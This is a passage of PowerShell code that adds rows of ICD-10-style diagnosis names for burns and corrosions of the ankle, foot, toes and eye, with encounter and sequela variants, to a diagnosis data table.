of multiple sites of right ankle and foot, initial encounter") + $null = $DiagnosisList.Rows.Add("Burn of third degree of multiple sites of right ankle and foot","Burn of third degree of multiple sites of right ankle and foot, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Burn of third degree of multiple sites of right ankle and foot","Burn of third degree of multiple sites of right ankle and foot, sequela") + $null = $DiagnosisList.Rows.Add("Burn of third degree of multiple sites of left ankle and foot","Burn of third degree of multiple sites of left ankle and foot, initial encounter") + $null = $DiagnosisList.Rows.Add("Burn of third degree of multiple sites of left ankle and foot","Burn of third degree of multiple sites of left ankle and foot, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Burn of third degree of multiple sites of left ankle and foot","Burn of third degree of multiple sites of left ankle and foot, sequela") + $null = $DiagnosisList.Rows.Add("Burn of third degree of multiple sites of unspecified ankle and foot","Burn of third degree of multiple sites of unspecified ankle and foot, initial encounter") + $null = $DiagnosisList.Rows.Add("Burn of third degree of multiple sites of unspecified ankle and foot","Burn of third degree of multiple sites of unspecified ankle and foot, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Burn of third degree of multiple sites of unspecified ankle and foot","Burn of third degree of multiple sites of unspecified ankle and foot, sequela") + $null = $DiagnosisList.Rows.Add("Corrosion of unspecified degree of right ankle","Corrosion of unspecified degree of right ankle, initial encounter") + $null = $DiagnosisList.Rows.Add("Corrosion of unspecified degree of right ankle","Corrosion of unspecified degree of right ankle, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Corrosion of unspecified degree of right ankle","Corrosion of unspecified degree of right ankle, sequela") + $null = $DiagnosisList.Rows.Add("Corrosion of unspecified degree of left ankle","Corrosion of unspecified degree of left ankle, initial encounter") + $null = $DiagnosisList.Rows.Add("Corrosion of unspecified degree of left ankle","Corrosion of unspecified degree of left ankle, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Corrosion of unspecified degree of left ankle","Corrosion of unspecified degree of left ankle, sequela") + $null = $DiagnosisList.Rows.Add("Corrosion of unspecified degree of unspecified ankle","Corrosion of unspecified degree of unspecified ankle, initial encounter") + $null = $DiagnosisList.Rows.Add("Corrosion of unspecified degree of unspecified ankle","Corrosion of unspecified degree of unspecified ankle, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Corrosion of unspecified degree of unspecified ankle","Corrosion of unspecified degree of unspecified ankle, sequela") + $null = $DiagnosisList.Rows.Add("Corrosion of unspecified degree of right foot","Corrosion of unspecified degree of right foot, initial encounter") + $null = $DiagnosisList.Rows.Add("Corrosion of unspecified degree of right foot","Corrosion of unspecified degree of right foot, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Corrosion of unspecified degree of right foot","Corrosion of unspecified degree of right foot, sequela") + $null = $DiagnosisList.Rows.Add("Corrosion of unspecified degree of left foot","Corrosion of unspecified degree of left foot, initial encounter") + $null = $DiagnosisList.Rows.Add("Corrosion of unspecified degree of left foot","Corrosion of unspecified degree of left foot, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Corrosion of unspecified degree of left foot","Corrosion of unspecified degree of left foot, sequela") + $null = $DiagnosisList.Rows.Add("Corrosion of unspecified degree of unspecified foot","Corrosion of unspecified degree of unspecified foot, initial encounter") + $null = $DiagnosisList.Rows.Add("Corrosion of unspecified degree of unspecified foot","Corrosion of unspecified degree of unspecified foot, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Corrosion of unspecified degree of unspecified foot","Corrosion of unspecified degree of unspecified foot, sequela") + $null = $DiagnosisList.Rows.Add("Corrosion of unspecified degree of right toe(s) (nail)","Corrosion of unspecified degree of right toe(s) (nail), initial encounter") + $null = $DiagnosisList.Rows.Add("Corrosion of unspecified degree of right toe(s) (nail)","Corrosion of unspecified degree of right toe(s) (nail), subsequent encounter") + $null = $DiagnosisList.Rows.Add("Corrosion of unspecified degree of right toe(s) (nail)","Corrosion of unspecified degree of right toe(s) (nail), sequela") + $null = $DiagnosisList.Rows.Add("Corrosion of unspecified degree of left toe(s) (nail)","Corrosion of unspecified degree of left toe(s) (nail), initial encounter") + $null = $DiagnosisList.Rows.Add("Corrosion of unspecified degree of left toe(s) (nail)","Corrosion of unspecified degree of left toe(s) (nail), subsequent encounter") + $null = $DiagnosisList.Rows.Add("Corrosion of unspecified degree of left toe(s) (nail)","Corrosion of unspecified degree of left toe(s) (nail), sequela") + $null = $DiagnosisList.Rows.Add("Corrosion of unspecified degree of unspecified toe(s) (nail)","Corrosion of unspecified degree of unspecified toe(s) (nail), initial encounter") + $null = $DiagnosisList.Rows.Add("Corrosion of unspecified degree of unspecified toe(s) (nail)","Corrosion of unspecified degree of unspecified toe(s) (nail), subsequent encounter") + $null = $DiagnosisList.Rows.Add("Corrosion of unspecified degree of unspecified toe(s) (nail)","Corrosion of unspecified degree of unspecified toe(s) (nail), sequela") + $null = $DiagnosisList.Rows.Add("Corrosion of unspecified degree of multiple sites of right ankle and foot","Corrosion of unspecified degree of multiple sites of right ankle and foot, initial encounter") + $null = $DiagnosisList.Rows.Add("Corrosion of unspecified degree of multiple sites of right ankle and foot","Corrosion of unspecified degree of multiple sites of right ankle and foot, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Corrosion of unspecified degree of multiple sites of right ankle and foot","Corrosion of unspecified degree of multiple sites of right ankle and foot, sequela") + $null = $DiagnosisList.Rows.Add("Corrosion of unspecified degree of multiple sites of left ankle and foot","Corrosion of unspecified degree of multiple sites of left ankle and foot, initial encounter") + $null = $DiagnosisList.Rows.Add("Corrosion of unspecified degree of multiple sites of left ankle and foot","Corrosion of unspecified degree of multiple sites of left ankle and foot, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Corrosion of unspecified degree of multiple sites of left ankle and foot","Corrosion of unspecified degree of multiple sites of left ankle and foot, sequela") + $null = $DiagnosisList.Rows.Add("Corrosion of unspecified degree of multiple sites of unspecified ankle and foot","Corrosion of unspecified degree of multiple sites of unspecified ankle and foot, initial encounter") + $null = $DiagnosisList.Rows.Add("Corrosion of unspecified degree of multiple sites of unspecified ankle and foot","Corrosion of unspecified degree of multiple sites of unspecified ankle and foot, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Corrosion of unspecified degree of multiple sites of unspecified ankle and foot","Corrosion of unspecified degree of multiple sites of unspecified ankle and foot, sequela") + $null = $DiagnosisList.Rows.Add("Corrosion of first degree of right ankle","Corrosion of first degree of right ankle, initial encounter") + $null = $DiagnosisList.Rows.Add("Corrosion of first degree of right ankle","Corrosion of first degree of right ankle, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Corrosion of first degree of right ankle","Corrosion of first degree of right ankle, sequela") + $null = $DiagnosisList.Rows.Add("Corrosion of first degree of left ankle","Corrosion of first degree of left ankle, initial encounter") + $null = $DiagnosisList.Rows.Add("Corrosion of first degree of left ankle","Corrosion of first degree of left ankle, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Corrosion of first degree of left ankle","Corrosion of first degree of left ankle, sequela") + $null = $DiagnosisList.Rows.Add("Corrosion of first degree of unspecified ankle","Corrosion of first degree of unspecified ankle, initial encounter") + $null = $DiagnosisList.Rows.Add("Corrosion of first degree of unspecified ankle","Corrosion of first degree of unspecified ankle, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Corrosion of first degree of unspecified ankle","Corrosion of first degree of unspecified ankle, sequela") + $null = $DiagnosisList.Rows.Add("Corrosion of first degree of right foot","Corrosion of first degree of right foot, initial encounter") + $null = $DiagnosisList.Rows.Add("Corrosion of first degree of right foot","Corrosion of first degree of right foot, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Corrosion of first degree of right foot","Corrosion of first degree of right foot, sequela") + $null = $DiagnosisList.Rows.Add("Corrosion of first degree of left foot","Corrosion of first degree of left foot, initial encounter") + $null = $DiagnosisList.Rows.Add("Corrosion of first degree of left foot","Corrosion of first degree of left foot, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Corrosion of first degree of left foot","Corrosion of first degree of left foot, sequela") + $null = $DiagnosisList.Rows.Add("Corrosion of first degree of unspecified foot","Corrosion of first degree of unspecified foot, initial encounter") + $null = $DiagnosisList.Rows.Add("Corrosion of first degree of unspecified foot","Corrosion of first degree of unspecified foot, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Corrosion of first degree of unspecified foot","Corrosion of first degree of unspecified foot, sequela") + $null = $DiagnosisList.Rows.Add("Corrosion of first degree of right toe(s) (nail)","Corrosion of first degree of right toe(s) (nail), initial encounter") + $null = $DiagnosisList.Rows.Add("Corrosion of first degree of right toe(s) (nail)","Corrosion of first degree of right toe(s) (nail), subsequent encounter") + $null = $DiagnosisList.Rows.Add("Corrosion of first degree of right toe(s) (nail)","Corrosion of first degree of right toe(s) (nail), sequela") + $null = $DiagnosisList.Rows.Add("Corrosion of first degree of left toe(s) (nail)","Corrosion of first degree of left toe(s) (nail), initial encounter") + $null = $DiagnosisList.Rows.Add("Corrosion of first degree of left toe(s) (nail)","Corrosion of first degree of left toe(s) (nail), subsequent encounter") + $null = $DiagnosisList.Rows.Add("Corrosion of first degree of left toe(s) (nail)","Corrosion of first degree of left toe(s) (nail), sequela") + $null = $DiagnosisList.Rows.Add("Corrosion of first degree of unspecified toe(s) (nail)","Corrosion of first degree of unspecified toe(s) (nail), initial encounter") + $null = $DiagnosisList.Rows.Add("Corrosion of first degree of unspecified toe(s) (nail)","Corrosion of first degree of unspecified toe(s) (nail), subsequent encounter") + $null = $DiagnosisList.Rows.Add("Corrosion of first degree of unspecified toe(s) (nail)","Corrosion of first degree of unspecified toe(s) (nail), sequela") + $null = $DiagnosisList.Rows.Add("Corrosion of first degree of multiple sites of right ankle and foot","Corrosion of first degree of multiple sites of right ankle and foot, initial encounter") + $null = $DiagnosisList.Rows.Add("Corrosion of first degree of multiple sites of right ankle and foot","Corrosion of first degree of multiple sites of right ankle and foot, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Corrosion of first degree of multiple sites of right ankle and foot","Corrosion of first degree of multiple sites of right ankle and foot, sequela") + $null = $DiagnosisList.Rows.Add("Corrosion of first degree of multiple sites of left ankle and foot","Corrosion of first degree of multiple sites of left ankle and foot, initial encounter") + $null = $DiagnosisList.Rows.Add("Corrosion of first degree of multiple sites of left ankle and foot","Corrosion of first degree of multiple sites of left ankle and foot, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Corrosion of first degree of multiple sites of left ankle and foot","Corrosion of first degree of multiple sites of left ankle and foot, sequela") + $null = $DiagnosisList.Rows.Add("Corrosion of first degree of multiple sites of unspecified ankle and foot","Corrosion of first degree of multiple sites of unspecified ankle and foot, initial encounter") + $null = $DiagnosisList.Rows.Add("Corrosion of first degree of multiple sites of unspecified ankle and foot","Corrosion of first degree of multiple sites of unspecified ankle and foot, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Corrosion of first degree of multiple sites of unspecified ankle and foot","Corrosion of first degree of multiple sites of unspecified ankle and foot, sequela") + $null = $DiagnosisList.Rows.Add("Corrosion of second degree of right ankle","Corrosion of second degree of right ankle, initial encounter") + $null = $DiagnosisList.Rows.Add("Corrosion of second degree of right ankle","Corrosion of second degree of right ankle, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Corrosion of second degree of right ankle","Corrosion of second degree of right ankle, sequela") + $null = $DiagnosisList.Rows.Add("Corrosion of second degree of left ankle","Corrosion of second degree of left ankle, initial encounter") + $null = $DiagnosisList.Rows.Add("Corrosion of second degree of left ankle","Corrosion of second degree of left ankle, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Corrosion of second degree of left ankle","Corrosion of second degree of left ankle, sequela") + $null = $DiagnosisList.Rows.Add("Corrosion of second degree of unspecified ankle","Corrosion of second degree of unspecified ankle, initial encounter") + $null = $DiagnosisList.Rows.Add("Corrosion of second degree of unspecified ankle","Corrosion of second degree of unspecified ankle, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Corrosion of second degree of unspecified ankle","Corrosion of second degree of unspecified ankle, sequela") + $null = $DiagnosisList.Rows.Add("Corrosion of second degree of right foot","Corrosion of second degree of right foot, initial encounter") + $null = $DiagnosisList.Rows.Add("Corrosion of second degree of right foot","Corrosion of second degree of right foot, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Corrosion of second degree of right foot","Corrosion of second degree of right foot, sequela") + $null = $DiagnosisList.Rows.Add("Corrosion of second degree of left foot","Corrosion of second degree of left foot, initial encounter") + $null = $DiagnosisList.Rows.Add("Corrosion of second degree of left foot","Corrosion of second degree of left foot, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Corrosion of second degree of left foot","Corrosion of second degree of left foot, sequela") + $null = $DiagnosisList.Rows.Add("Corrosion of second degree of unspecified foot","Corrosion of second degree of unspecified foot, initial encounter") + $null = $DiagnosisList.Rows.Add("Corrosion of second degree of unspecified foot","Corrosion of second degree of unspecified foot, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Corrosion of second degree of unspecified foot","Corrosion of second degree of unspecified foot, sequela") + $null = $DiagnosisList.Rows.Add("Corrosion of second degree of right toe(s) (nail)","Corrosion of second degree of right toe(s) (nail), initial encounter") + $null = $DiagnosisList.Rows.Add("Corrosion of second degree of right toe(s) (nail)","Corrosion of second degree of right toe(s) (nail), subsequent encounter") + $null = $DiagnosisList.Rows.Add("Corrosion of second degree of right toe(s) (nail)","Corrosion of second degree of right toe(s) (nail), sequela") + $null = $DiagnosisList.Rows.Add("Corrosion of second degree of left toe(s) (nail)","Corrosion of second degree of left toe(s) (nail), initial encounter") + $null = $DiagnosisList.Rows.Add("Corrosion of second degree of left toe(s) (nail)","Corrosion of second degree of left toe(s) (nail), subsequent encounter") + $null = $DiagnosisList.Rows.Add("Corrosion of second degree of left toe(s) (nail)","Corrosion of second degree of left toe(s) (nail), sequela") + $null = $DiagnosisList.Rows.Add("Corrosion of second degree of unspecified toe(s) (nail)","Corrosion of second degree of unspecified toe(s) (nail), initial encounter") + $null = $DiagnosisList.Rows.Add("Corrosion of second degree of unspecified toe(s) (nail)","Corrosion of second degree of unspecified toe(s) (nail), subsequent encounter") + $null = $DiagnosisList.Rows.Add("Corrosion of second degree of unspecified toe(s) (nail)","Corrosion of second degree of unspecified toe(s) (nail), sequela") + $null = $DiagnosisList.Rows.Add("Corrosion of second degree of right ankle and foot","Corrosion of second degree of right ankle and foot, initial encounter") + $null = $DiagnosisList.Rows.Add("Corrosion of second degree of right ankle and foot","Corrosion of second degree of right ankle and foot, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Corrosion of second degree of right ankle and foot","Corrosion of second degree of right ankle and foot, sequela") + $null = $DiagnosisList.Rows.Add("Corrosion of second degree of left ankle and foot","Corrosion of second degree of left ankle and foot, initial encounter") + $null = $DiagnosisList.Rows.Add("Corrosion of second degree of left ankle and foot","Corrosion of second degree of left ankle and foot, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Corrosion of second degree of left ankle and foot","Corrosion of second degree of left ankle and foot, sequela") + $null = $DiagnosisList.Rows.Add("Corrosion of second degree of unspecified ankle and foot","Corrosion of second degree of unspecified ankle and foot, initial encounter") + $null = $DiagnosisList.Rows.Add("Corrosion of second degree of unspecified ankle and foot","Corrosion of second degree of unspecified ankle and foot, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Corrosion of second degree of unspecified ankle and foot","Corrosion of second degree of unspecified ankle and foot, sequela") + $null = $DiagnosisList.Rows.Add("Corrosion of third degree of right ankle","Corrosion of third degree of right ankle, initial encounter") + $null = $DiagnosisList.Rows.Add("Corrosion of third degree of right ankle","Corrosion of third degree of right ankle, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Corrosion of third degree of right ankle","Corrosion of third degree of right ankle, sequela") + $null = $DiagnosisList.Rows.Add("Corrosion of third degree of left ankle","Corrosion of third degree of left ankle, initial encounter") + $null = $DiagnosisList.Rows.Add("Corrosion of third degree of left ankle","Corrosion of third degree of left ankle, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Corrosion of third degree of left ankle","Corrosion of third degree of left ankle, sequela") + $null = $DiagnosisList.Rows.Add("Corrosion of third degree of unspecified ankle","Corrosion of third degree of unspecified ankle, initial encounter") + $null = $DiagnosisList.Rows.Add("Corrosion of third degree of unspecified ankle","Corrosion of third degree of unspecified ankle, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Corrosion of third degree of unspecified ankle","Corrosion of third degree of unspecified ankle, sequela") + $null = $DiagnosisList.Rows.Add("Corrosion of third degree of right foot","Corrosion of third degree of right foot, initial encounter") + $null = $DiagnosisList.Rows.Add("Corrosion of third degree of right foot","Corrosion of third degree of right foot, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Corrosion of third degree of right foot","Corrosion of third degree of right foot, sequela") + $null = $DiagnosisList.Rows.Add("Corrosion of third degree of left foot","Corrosion of third degree of left foot, initial encounter") + $null = $DiagnosisList.Rows.Add("Corrosion of third degree of left foot","Corrosion of third degree of left foot, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Corrosion of third degree of left foot","Corrosion of third degree of left foot, sequela") + $null = $DiagnosisList.Rows.Add("Corrosion of third degree of unspecified foot","Corrosion of third degree of unspecified foot, initial encounter") + $null = $DiagnosisList.Rows.Add("Corrosion of third degree of unspecified foot","Corrosion of third degree of unspecified foot, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Corrosion of third degree of unspecified foot","Corrosion of third degree of unspecified foot, sequela") + $null = $DiagnosisList.Rows.Add("Corrosion of third degree of right toe(s) (nail)","Corrosion of third degree of right toe(s) (nail), initial encounter") + $null = $DiagnosisList.Rows.Add("Corrosion of third degree of right toe(s) (nail)","Corrosion of third degree of right toe(s) (nail), subsequent encounter") + $null = $DiagnosisList.Rows.Add("Corrosion of third degree of right toe(s) (nail)","Corrosion of third degree of right toe(s) (nail), sequela") + $null = $DiagnosisList.Rows.Add("Corrosion of third degree of left toe(s) (nail)","Corrosion of third degree of left toe(s) (nail), initial encounter") + $null = $DiagnosisList.Rows.Add("Corrosion of third degree of left toe(s) (nail)","Corrosion of third degree of left toe(s) (nail), subsequent encounter") + $null = $DiagnosisList.Rows.Add("Corrosion of third degree of left toe(s) (nail)","Corrosion of third degree of left toe(s) (nail), sequela") + $null = $DiagnosisList.Rows.Add("Corrosion of third degree of unspecified toe(s) (nail)","Corrosion of third degree of unspecified toe(s) (nail), initial encounter") + $null = $DiagnosisList.Rows.Add("Corrosion of third degree of unspecified toe(s) (nail)","Corrosion of third degree of unspecified toe(s) (nail), subsequent encounter") + $null = $DiagnosisList.Rows.Add("Corrosion of third degree of unspecified toe(s) (nail)","Corrosion of third degree of unspecified toe(s) (nail), sequela") + $null = $DiagnosisList.Rows.Add("Corrosion of third degree of multiple sites of right ankle and foot","Corrosion of third degree of multiple sites of right ankle and foot, initial encounter") + $null = $DiagnosisList.Rows.Add("Corrosion of third degree of multiple sites of right ankle and foot","Corrosion of third degree of multiple sites of right ankle and foot, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Corrosion of third degree of multiple sites of right ankle and foot","Corrosion of third degree of multiple sites of right ankle and foot, sequela") + $null = $DiagnosisList.Rows.Add("Corrosion of third degree of multiple sites of left ankle and foot","Corrosion of third degree of multiple sites of left ankle and foot, initial encounter") + $null = $DiagnosisList.Rows.Add("Corrosion of third degree of multiple sites of left ankle and foot","Corrosion of third degree of multiple sites of left ankle and foot, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Corrosion of third degree of multiple sites of left ankle and foot","Corrosion of third degree of multiple sites of left ankle and foot, sequela") + $null = $DiagnosisList.Rows.Add("Corrosion of third degree of multiple sites of unspecified ankle and foot","Corrosion of third degree of multiple sites of unspecified ankle and foot, initial encounter") + $null = $DiagnosisList.Rows.Add("Corrosion of third degree of multiple sites of unspecified ankle and foot","Corrosion of third degree of multiple sites of unspecified ankle and foot, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Corrosion of third degree of multiple sites of unspecified ankle and foot","Corrosion of third degree of multiple sites of unspecified ankle and foot, sequela") + $null = $DiagnosisList.Rows.Add("Burn of unspecified eyelid and periocular area","Burn of unspecified eyelid and periocular area, initial encounter") + $null = $DiagnosisList.Rows.Add("Burn of unspecified eyelid and periocular area","Burn of unspecified eyelid and periocular area, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Burn of unspecified eyelid and periocular area","Burn of unspecified eyelid and periocular area, sequela") + $null = $DiagnosisList.Rows.Add("Burn of right eyelid and periocular area","Burn of right eyelid and periocular area, initial encounter") + $null = $DiagnosisList.Rows.Add("Burn of right eyelid and periocular area","Burn of right eyelid and periocular area, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Burn of right eyelid and periocular area","Burn of right eyelid and periocular area, sequela") + $null = $DiagnosisList.Rows.Add("Burn of left eyelid and periocular area","Burn of left eyelid and periocular area, initial encounter") + $null = $DiagnosisList.Rows.Add("Burn of left eyelid and periocular area","Burn of left eyelid and periocular area, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Burn of left eyelid and periocular area","Burn of left eyelid and periocular area, sequela") + $null = $DiagnosisList.Rows.Add("Burn of cornea and conjunctival sac, unspecified eye","Burn of cornea and conjunctival sac, unspecified eye, initial encounter") + $null = $DiagnosisList.Rows.Add("Burn of cornea and conjunctival sac, unspecified eye","Burn of cornea and conjunctival sac, unspecified eye, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Burn of cornea and conjunctival sac, unspecified eye","Burn of cornea and conjunctival sac, unspecified eye, sequela") + $null = $DiagnosisList.Rows.Add("Burn of cornea and conjunctival sac, right eye","Burn of cornea and conjunctival sac, right eye, initial encounter") + $null = $DiagnosisList.Rows.Add("Burn of cornea and conjunctival sac, right eye","Burn of cornea and conjunctival sac, right eye, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Burn of cornea and conjunctival sac, right eye","Burn of cornea and conjunctival sac, right eye, sequela") + $null = $DiagnosisList.Rows.Add("Burn of cornea and conjunctival sac, left eye","Burn of cornea and conjunctival sac, left eye, initial encounter") + $null = $DiagnosisList.Rows.Add("Burn of cornea and conjunctival sac, left eye","Burn of cornea and conjunctival sac, left eye, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Burn of cornea and conjunctival sac, left eye","Burn of cornea and conjunctival sac, left eye, sequela") + $null = $DiagnosisList.Rows.Add("Burn with resulting rupture and destruction of unspecified eyeball","Burn with resulting rupture and destruction of unspecified eyeball, initial encounter") + $null = $DiagnosisList.Rows.Add("Burn with resulting rupture and destruction of unspecified eyeball","Burn with resulting rupture and destruction of unspecified eyeball, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Burn with resulting rupture and destruction of unspecified eyeball","Burn with resulting rupture and destruction of unspecified eyeball, sequela") + $null = $DiagnosisList.Rows.Add("Burn with resulting rupture and destruction of right eyeball","Burn with resulting rupture and destruction of right eyeball, initial encounter") + $null = $DiagnosisList.Rows.Add("Burn with resulting rupture and destruction of right eyeball","Burn with resulting rupture and destruction of right eyeball, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Burn with resulting rupture and destruction of right eyeball","Burn with resulting rupture and destruction of right eyeball, sequela") + $null = $DiagnosisList.Rows.Add("Burn with resulting rupture and destruction of left eyeball","Burn with resulting rupture and destruction of left eyeball, initial encounter") + $null = $DiagnosisList.Rows.Add("Burn with resulting rupture and destruction of left eyeball","Burn with resulting rupture and destruction of left eyeball, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Burn with resulting rupture and destruction of left eyeball","Burn with resulting rupture and destruction of left eyeball, sequela") + $null = $DiagnosisList.Rows.Add("Burns of other specified parts of unspecified eye and adnexa","Burns of other specified parts of unspecified eye and adnexa, initial encounter") + $null = $DiagnosisList.Rows.Add("Burns of other specified parts of unspecified eye and adnexa","Burns of other specified parts of unspecified eye and adnexa, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Burns of other specified parts of unspecified eye and adnexa","Burns of other specified parts of unspecified eye and adnexa, sequela") + $null = $DiagnosisList.Rows.Add("Burns of other specified parts of right eye and adnexa","Burns of other specified parts of right eye and adnexa, initial encounter") + $null = $DiagnosisList.Rows.Add("Burns of other specified parts of right eye and adnexa","Burns of other specified parts of right eye and adnexa, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Burns of other specified parts of right eye and adnexa","Burns of other specified parts of right eye and adnexa, sequela") + $null = $DiagnosisList.Rows.Add("Burns of other specified parts of left eye and adnexa","Burns of other specified parts of left eye and adnexa, initial encounter") + $null = $DiagnosisList.Rows.Add("Burns of other specified parts of left eye and adnexa","Burns of other specified parts of left eye and adnexa, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Burns of other specified parts of left eye and adnexa","Burns of other specified parts of left eye and adnexa, sequela") + $null = $DiagnosisList.Rows.Add("Burn of unspecified eye and adnexa, part unspecified","Burn of unspecified eye and adnexa, part unspecified, initial encounter") + $null = $DiagnosisList.Rows.Add("Burn of unspecified eye and adnexa, part unspecified","Burn of unspecified eye and adnexa, part unspecified, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Burn of unspecified eye and adnexa, part unspecified","Burn of unspecified eye and adnexa, part unspecified, sequela") + $null = $DiagnosisList.Rows.Add("Burn of right eye and adnexa, part unspecified","Burn of right eye and adnexa, part unspecified, initial encounter") + $null = $DiagnosisList.Rows.Add("Burn of right eye and adnexa, part unspecified","Burn of right eye and adnexa, part unspecified, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Burn of right eye and adnexa, part unspecified","Burn of right eye and adnexa, part unspecified, sequela") + $null = $DiagnosisList.Rows.Add("Burn of left eye and adnexa, part unspecified","Burn of left eye and adnexa, part unspecified, initial encounter") + $null = $DiagnosisList.Rows.Add("Burn of left eye and adnexa, part unspecified","Burn of left eye and adnexa, part unspecified, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Burn of left eye and adnexa, part unspecified","Burn of left eye and adnexa, part unspecified, sequela") + $null = $DiagnosisList.Rows.Add("Corrosion of unspecified eyelid and periocular area","Corrosion of unspecified eyelid and periocular area, initial encounter") + $null = $DiagnosisList.Rows.Add("Corrosion of unspecified eyelid and periocular area","Corrosion of unspecified eyelid and periocular area, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Corrosion of unspecified eyelid and periocular area","Corrosion of unspecified eyelid and periocular area, sequela") + $null = $DiagnosisList.Rows.Add("Corrosion of right eyelid and periocular area","Corrosion of right eyelid and periocular area, initial encounter") + $null = $DiagnosisList.Rows.Add("Corrosion of right eyelid and periocular area","Corrosion of right eyelid and periocular area, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Corrosion of right eyelid and periocular area","Corrosion of right eyelid and periocular area, sequela") + $null = $DiagnosisList.Rows.Add("Corrosion of left eyelid and periocular area","Corrosion of left eyelid and periocular area, initial encounter") + $null = $DiagnosisList.Rows.Add("Corrosion of left eyelid and periocular area","Corrosion of left eyelid and periocular area, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Corrosion of left eyelid and periocular area","Corrosion of left eyelid and periocular area, sequela") + $null = $DiagnosisList.Rows.Add("Corrosion of cornea and conjunctival sac, unspecified eye","Corrosion of cornea and conjunctival sac, unspecified eye, initial encounter") + $null = $DiagnosisList.Rows.Add("Corrosion of cornea and conjunctival sac, unspecified eye","Corrosion of cornea and conjunctival sac, unspecified eye, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Corrosion of cornea and conjunctival sac, unspecified eye","Corrosion of cornea and conjunctival sac, unspecified eye, sequela") + $null = $DiagnosisList.Rows.Add("Corrosion of cornea and conjunctival sac, right eye","Corrosion of cornea and conjunctival sac, right eye, initial encounter") + $null = $DiagnosisList.Rows.Add("Corrosion of cornea and conjunctival sac, right eye","Corrosion of cornea and conjunctival sac, right eye, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Corrosion of cornea and conjunctival sac, right eye","Corrosion of cornea and conjunctival sac, right eye, sequela") + $null = $DiagnosisList.Rows.Add("Corrosion of cornea and conjunctival sac, left eye","Corrosion of cornea and conjunctival sac, left eye, initial encounter") + $null = $DiagnosisList.Rows.Add("Corrosion of cornea and conjunctival sac, left eye","Corrosion of cornea and conjunctival sac, left eye, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Corrosion of cornea and conjunctival sac, left eye","Corrosion of cornea and conjunctival sac, left eye, sequela") + $null = $DiagnosisList.Rows.Add("Corrosion with resulting rupture and destruction of unspecified eyeball","Corrosion with resulting rupture and destruction of unspecified eyeball, initial encounter") + $null = $DiagnosisList.Rows.Add("Corrosion with resulting rupture and destruction of unspecified eyeball","Corrosion with resulting rupture and destruction of unspecified eyeball, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Corrosion with resulting rupture and destruction of unspecified eyeball","Corrosion with resulting rupture and destruction of unspecified eyeball, sequela") + $null = $DiagnosisList.Rows.Add("Corrosion with resulting rupture and destruction of right eyeball","Corrosion with resulting rupture and destruction of right eyeball, initial encounter") + $null = $DiagnosisList.Rows.Add("Corrosion with resulting rupture and destruction of right eyeball","Corrosion with resulting rupture and destruction of right eyeball, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Corrosion with resulting rupture and destruction of right eyeball","Corrosion with resulting rupture and destruction of right eyeball, sequela") + $null = $DiagnosisList.Rows.Add("Corrosion with resulting rupture and destruction of left eyeball","Corrosion with resulting rupture and destruction of left eyeball, initial encounter") + $null = $DiagnosisList.Rows.Add("Corrosion with resulting rupture and destruction of left eyeball","Corrosion with resulting rupture and destruction of left eyeball, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Corrosion with resulting rupture and destruction of left eyeball","Corrosion with resulting rupture and destruction of left eyeball, sequela") + $null = $DiagnosisList.Rows.Add("Corrosions of other specified parts of unspecified eye and adnexa","Corrosions of other specified parts of unspecified eye and adnexa, initial encounter") + $null = $DiagnosisList.Rows.Add("Corrosions of other specified parts of unspecified eye and adnexa","Corrosions of other specified parts of unspecified eye and adnexa, 